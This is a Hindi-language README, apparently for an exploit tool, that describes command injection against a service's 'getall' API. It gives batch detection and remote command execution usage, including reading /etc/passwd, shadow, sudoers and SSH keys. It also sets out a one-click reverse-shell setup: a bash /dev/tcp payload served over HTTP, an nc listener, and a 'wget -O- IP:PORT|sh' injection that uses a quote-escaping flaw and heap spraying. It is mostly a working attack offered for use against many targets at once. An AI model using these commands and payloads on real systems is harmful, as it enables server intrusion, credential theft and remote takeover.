
इसमें निष्पादन योग्य कमांड डिटेक्शन और वन-क्लिक getshell शामिल है (सर्वर पर सेवा तैनात करने की आवश्यकता है)
इसमें निष्पादित कमांड डिटेक्शन और वन-क्लिक गेटशेल शामिल है (सर्वर पर सेवा तैनाती की आवश्यकता है) pco.yaml को nuclei के साथ उपयोग करके तेजी से डिटेक्ट किया जा सकता है
python go.py
लक्ष्य URL दर्ज करें → मेनू से फीचर चुनें।
# त्वरित डिटेक्ट (8 बुनियादी जानकारी)
python go.py -t https://IP:PORT --probe fast
# गहन डिटेक्ट (सभी कमांड: 30+ आइटम)
python go.py -t https://IP:PORT --probe deep
# बैच डिटेक्ट
python go.py -f vulnerable_targets.txt --probe fast
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"
# बैच समवर्ती (20 थ्रेड)
python go.py -f targets.txt -c "hostname" --batch 20
हमलावर मशीन पर दो टर्मिनल खोलें:
# टर्मिनल 1 - HTTP सेवा (rev.sh प्रदान करता है)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087
# टर्मिनल 2 - रिवर्स शेल की प्रतीक्षा
nc -lvnp 8088
फिर payload भेजें:
# एकल लक्ष्य
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088
# बैच (सीरियल, एक बार में केवल एक कनेक्शन)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088
स्क्रिप्ट भेजने से पहले तैयारी के चरण प्रिंट करेगी।
| श्रेणी | कमांड |
|---|---|
| बुनियादी जानकारी | hostname, uname -a, kernel, OS release, uptime |
| उपयोगकर्ता | id, whoami, users/w/who |
| नेटवर्क | ifconfig, route, arp, listening ports, connections, iptables |
| सिस्टम | processes, cpuinfo, meminfo, disk, mount |
| फ़ाइलें | ls / /root /tmp /home /etc |
| कॉन्फ़िगरेशन | crontab, passwd, shadow, sudoers, SSH keys |
| एक्सटेंशन | config search, scripts, docker, containers |
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
"g0":"AAAAAAAAAAAAAAAA'; <कमांड> #", ...}
apiuser="''''" escape_quotes() के null टर्मिनेशन दोष को ट्रिगर करता हैg0~g60 61 बार हीप स्प्रे करता है, सफलता दर बढ़ाता है'; <कमांड> # संदर्भ बंद करता है, # आगे के भाग को टिप्पणी करता हैecho tag के बिना 34 वर्ण उपलब्ध:
wget -O- IP:PORT|sh (31 वर्ण)
पाइपलाइन श्रृंखला: wget डाउनलोड → sh निष्पादन → bash निर्दिष्ट पोर्ट पर रिवर्स शेल भेजता है।
| पैरामीटर | कार्य |
|---|---|
-t, --target URL | लक्ष्य पता |
-f, --file FILE | लक्ष्य सूची फ़ाइल |
-l, --lhost IP | हमलावर मशीन IP |
-p, --lport PORT | HTTP सेवा पोर्ट (डिफ़ॉल्ट 8087) |
-n, --ncport PORT | nc सुनने वाला पोर्ट (डिफ़ॉल्ट 8088) |
-c, --cmd CMD | कमांड निष्पादित करें |
--probe fast/deep | त्वरित/गहन डिटेक्ट |
--batch N | बैच समवर्ती संख्या (डिफ़ॉल्ट सीरियल) |